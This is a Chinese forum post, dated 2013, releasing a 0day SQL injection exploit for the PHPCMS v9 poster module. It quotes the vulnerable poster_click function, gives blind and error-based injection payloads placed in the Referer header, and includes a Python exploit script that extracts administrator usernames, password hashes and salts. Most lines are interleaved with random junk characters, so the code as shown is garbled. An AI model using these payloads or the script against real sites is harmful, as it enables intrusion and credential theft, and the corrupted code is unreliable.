有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
- c. K8 i% D2 M h* u! H6 I, _' w5 E% J4 D0 `# V
问题函数\phpcms\modules\poster\index.php# r5 _3 V+ v( ?; {: N# V: t* o
- j+ ~: K1 g A+ K/ u
public function poster_click() {& a9 p$ P. S. n) x! Q ], _
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;& ?$ i- ^. h2 K2 t" L" f" i
$r = $this->db->get_one(array('id'=>$id));
4 s1 o ~+ Y* u% \6 N4 I+ \3 m, [if (!is_array($r) && empty($r)) return false; _3 {. F& t7 {! D
$ip_area = pc_base::load_sys_class('ip_area');
. A( K. l# ^9 P3 N; Y$ip = ip();
3 K/ `2 B! v6 l3 l" {9 K2 `) F$area = $ip_area->get($ip);4 x9 I- k& ~) O. e
$username = param::get_cookie('username') ? param::get_cookie('username') : '';
M8 G( ^! x. ]# ^% j& Aif($id) {8 \5 i7 I7 F; n5 Z v0 {* [
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
) h" i% x. ~5 {- k- _/ j$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
& i0 \& N. m6 |5 }* c/ }1 _; \} y& f. o" t! N$ E; j9 `+ m/ @
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
$ N& J' H4 c; S9 X9 \$setting = string2array($r['setting']);
* v: A: U5 A7 g+ ~: fif (count($setting)==1) {
' L. g e& q: h2 A; ~$url = $setting['1']['linkurl'];
% v7 T' ~7 x3 F( p% [} else {8 ?. b: d4 P# q
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];1 b& [8 d1 R% l9 D) a
}
! i# s- T& i2 b$ P- O* lheader('Location: '.$url);
/ ?# i0 _; |7 ]}8 Q+ Z* F v5 ?% j' f6 [/ Z" p
/ m) E' V5 `" K! w5 d8 f1 K! k% ]' m ) v$ l% G) t1 ~0 u ?" L5 x3 d
+ {7 M5 ?* N& i& v利用方式:
, P% z8 A, w2 o) @1 I) E, K3 t5 e6 W7 c0 ?$ \# h0 J+ k
1、可以采用盲注入的手法:6 L/ ~; n( v4 z" B
8 u0 c& m: H: i" v
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
$ l& `- l1 ?* [1 d- ^- Y8 K5 i3 c" K& Z$ k1 z3 ]
通过返回页面,正常与否一个个猜解密码字段。7 d% N' G! V/ a6 ]! q$ c
( t; o0 E, D% v4 N3 S' ]+ Y7 b2、代码是花开写的,随手附上了:# a# Y s/ M" m* \
& A! W* G# k2 N/ A( q" c, k& H
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
; h7 V( q/ Y7 K: u: @( h- e' w7 H
此方法是爆错注入手法,原理自查。
% t% s, |; C3 w2 |0 S
' X4 h7 W+ k& W; I 6 Z9 G, Y* o& X; \
; c9 F1 w4 n4 g* Q$ |
利用程序:
) h2 V/ }( p* J( k6 d. Y5 E/ m* a" B4 ]% w9 p4 K$ e
#!/usr/bin/env python: T0 h/ U V& k) S1 I2 ?$ s4 _
import httplib,sys,re
. R2 S& p w- [0 S* Z7 @. s) L* `/ y% U' E1 D, ?
def attack():5 B' E* X( w. c
print “Code by Pax.Mac Team conqu3r!”3 P$ A; I% T$ g) ~" N, ?& `
print “Welcome to our zone!!!”
* t9 Y$ i( z) O+ ?* k$ O6 c( D" ^1 furl=sys.argv[1]
" i' W5 D7 m+ }/ `paths=sys.argv[2]
7 S* w4 p' M2 G) Y: ^: Zconn = httplib.HTTPConnection(url)2 x9 u, P" @: m
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″, s# r+ G8 \' m3 P- Z
“Accept”: “text/plain”,
2 P6 P" @1 W5 S: M6 P8 K“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
1 Q( F% f& P+ [ h! Fconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)# Y% p$ f2 ?+ H2 x" N
r1 = conn.getresponse(): O! s3 M" @! h( J
datas=r1.read()
( d r. r" }% @9 K! Q; R4 Bdatas=re.findall(r”Duplicate entry \’\w+’”, datas)
* J5 x7 m3 ~7 ?( \8 H8 ]0 B- X2 gprint datas[0]
7 r! i8 Y: C* n3 G+ kconn.close()# k$ v% |0 W- _
if __name__==”__main__”:
8 g9 M$ n5 {* h7 z& \. `if len(sys.argv)<3:/ M8 R3 `: e, E; I' {2 n
print “Code by Pax.Mac Team conqu3r”. ] m# ~% ~: J: k
print “Usgae:”) \" E) N" Q0 E* l* _6 o
print “ phpcmsattack.py www.paxmac.org /”8 H c' O+ ?% C+ K
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”0 h! O6 [6 @2 o" J% k: K4 ]
sys.exit(1)
: O4 \% F+ U$ K& Z: U Eattack()
+ |( G7 E( I/ y. ]( _/ h3 k" A: z D9 ]$ Z: N8 ]
|
发表于 2013-1-11 21:01:00
收藏
支持
反对